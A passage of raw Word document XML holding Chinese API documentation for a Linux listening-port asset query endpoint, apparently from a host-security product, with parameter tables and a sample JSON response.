      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4B6117E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3AD2DA8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55BD736D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6001FDEE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47776B6D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4F4580E7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66DDE010" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68E9B108" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68397D56" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="008A28A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4E884492" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="386F04A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1612145F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EA43F9A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E28CE8A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6F71373D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CBB76F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ECFF172" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A6E64BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="681B03E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6C36F45D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65611133" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57DDBD0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70AA684C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54701DE0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6CC2F5BC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13497366" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>proto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03DCBAD8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45F89914" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D157F56" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>协议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0C58AC9D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E5A11EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="306E88D7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B846E7C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="428F3E5F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5C118305" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40E2BE4E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bindIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55AB83D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FEC955C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="222AB940" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>绑定ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6F5B4C15" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26DC4E8E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>processName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CBE5B1A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DB9D327" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CE66FC9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1C82A835" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7BC65B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/port/linux?agentId=70db8ef89e9ae79a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36756760" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510BB14E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId":"70db8ef89e9ae79a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp":"172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp":"172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp":"172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId":39,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroup":"qingteng",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "test-test000",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "tmp"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "hostname":"qingteng",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "proto":"tcp",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "port":41935,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "pid":4906,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "processName":"java(com.intellij.idea.Main)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bindIp":"127.0.0.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "status":null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489DD899"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519"/>
        <w:gridCol w:w="1133"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="5885"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="0EB10CC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A8B488F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C6B9420" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="461E8B55" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CD41186" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4A3C9E90" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39434877" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="653FDCD6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E07F540" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72588D96" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agent uuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="467C43A0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="129BE9E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02684857" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75ABDEC9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D8EB32A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>显示IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6E24F483" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="283B2426" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FE6832B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4942FFC2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A5A8820" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3FB61888" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AC52AF8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="190E3CCB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="523F0346" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="566D71DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5FD7E465" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47D7ECCD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41A454AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="585179BE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48B84264" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="47623B71" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7861F05F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="604F6C1D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61F37B43" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54CC944D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0085C9CD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E8F465A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="798ABE89" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ABC97C9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1017EA57" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="571F2548" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="279B67CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FEA3BBB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28023782" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
